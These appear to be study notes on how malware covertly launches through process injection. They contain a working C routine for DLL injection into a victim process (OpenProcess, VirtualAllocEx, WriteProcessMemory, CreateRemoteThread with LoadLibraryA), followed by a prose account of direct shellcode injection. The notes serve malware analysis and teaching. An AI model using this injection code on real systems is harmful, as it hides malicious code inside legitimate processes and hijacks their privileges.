Index > Malware > 2021-02-09: Covert Malware Launching: Process Injection

2021-02-09: Covert Malware Launching: Process Injection

A quick review:

Process Injection

DLL Injection

When a process loads a DLL, the Windows loader calls the DLL's DllMain function (with the DLL_PROCESS_ATTACH reason), passing execution to the DLL.

The DLL has the same permissions as the process, and everything it does will appear to come from the process it was loaded by.

Malware uses CreateToolhelp32Snapshot, Process32First, and Process32Next to walk the process list and find a suitable victim: one running with the privileges the malware wants, and one it is allowed to open.

Malware uses OpenProcess to acquire a handle to the target process.

The process to be injected needs memory space to store the full path of the malicious DLL, terminating NUL included. Space can be allocated in the victim with VirtualAllocEx and filled with WriteProcessMemory.

From there, CreateRemoteThread can be called with three arguments that matter: the handle to the victim process, the address of LoadLibrary as the start routine of the new thread, and the address of the DLL path (written in the previous step) as the single argument passed to that routine.

This starts a new thread inside the target process, using LoadLibrary to pull in the malicious DLL. The DLL now has execution, the process's privileges, and acts as the process.

// Get a handle to the victim (victimProcessID was found with the Toolhelp calls above;
// PROCESS_ALL_ACCESS asks for far more than the injection actually needs)
HANDLE hVictimProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, victimProcessID);

// Full path of the evil DLL; sizeof() on the array includes the terminating NUL
char maliciousLibraryName[] = "C:\\evil.dll";

// Allocate space in the victim to store the evil DLL name
LPVOID pNameInVictimProcess = VirtualAllocEx(hVictimProcess, NULL, sizeof(maliciousLibraryName),
                                             MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Fill that space with the evil DLL name
WriteProcessMemory(hVictimProcess, pNameInVictimProcess, maliciousLibraryName,
                   sizeof(maliciousLibraryName), NULL);

// LoadLibraryA, used later, comes from inside Kernel32.dll. GetModuleHandle never loads
// anything; it works here only because Kernel32 is already mapped in every process
HMODULE hKernel32 = GetModuleHandle("Kernel32.dll");

// Get the address where our new thread should start. Kernel32 sits at the same base in
// the victim, so this address is valid there too (injector and victim must share bitness)
LPTHREAD_START_ROUTINE LoadLibraryAddress =
    (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryA");

// Launch a new thread in the victim, running LoadLibraryA(maliciousLibraryName)
HANDLE hThread = CreateRemoteThread(hVictimProcess, NULL, 0, LoadLibraryAddress,
                                    pNameInVictimProcess, 0, NULL);

// Done: victimProcessID has now loaded our evil DLL and run its DllMain.

Direct Injection

This is significantly more difficult than DLL injection. Attackers need to have a good reason to go through the work to do this.

This uses two VirtualAllocEx/WriteProcessMemory pairs, the second one with an executable page protection:

  1. Write the resources the code needs (strings, data) to the victim process
  2. Write the malicious code itself to the victim process, then start a thread at it

The injected code runs without the loader's help. The remote process might not have the libraries the code imports mapped, nothing relocates the code to the address it landed at, and its strings and other data are not sitting in a data section it can reach, so everything it needs must either travel with it or be located at run time.

Authors of direct-injection malware must therefore be skilled assembly programmers, or must limit themselves to very simple, self-contained shellcode.

